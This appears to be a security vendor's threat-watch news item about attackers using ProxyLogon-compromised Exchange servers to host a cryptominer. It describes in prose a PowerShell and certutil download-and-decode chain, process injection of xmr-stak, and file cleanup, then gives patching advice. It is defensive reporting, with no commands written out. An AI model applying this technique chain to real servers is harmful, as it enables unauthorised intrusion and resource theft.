Threat Watch

Compromised Exchange Servers Were Used to Host Payloads to Hack Other Exchange Servers

While many threat actors attempted to take advantage of the recent ProxyLogon Exchange vulnerabilities to deploy ransomware, some went in another direction. A Sophos report released Tuesday details an attack where the actors downloaded a cryptominer from other compromised Exchange servers.

PowerShell was used to download files with a .zip extension from the “/owa/auth” directory. These .zip files were actually batch (.bat) scripts that would run certutil.exe to download two more .zip files from the compromised Exchange server. Certutil is also used to base64 decode the content of the files it downloaded, creating two files: QuickCPU.exe and QuickCPU.dat.

QuickCPU.exe is thought to be a modified version of PEx64-Injector, an open-source project designed to inject a 64-bit .exe into a running 64-bit application without administrative privileges. QuickCPU.dat is an archive containing the crytpominer xmr-stak and its configuration file. After xmr-stak and its configuration file are injected into a running system process, the batch script deletes them and QuickCPU.dat from disk.


Although the FBI recently took action in the United States to remove web shells from Exchange servers comprised via the ProxyLogon vulnerabilities, other infections on the server may still persist and the servers were not patched on behalf of the organization. Binary Defense still highly recommends that any organizations that have yet to investigate their on-premise Exchange servers for signs of compromise do so as soon as possible. After ensuring the server is not compromised or has been sufficiently cleaned, patches should be applied using Microsoft’s One-Click Microsoft Exchange On-Premises Mitigation Tool.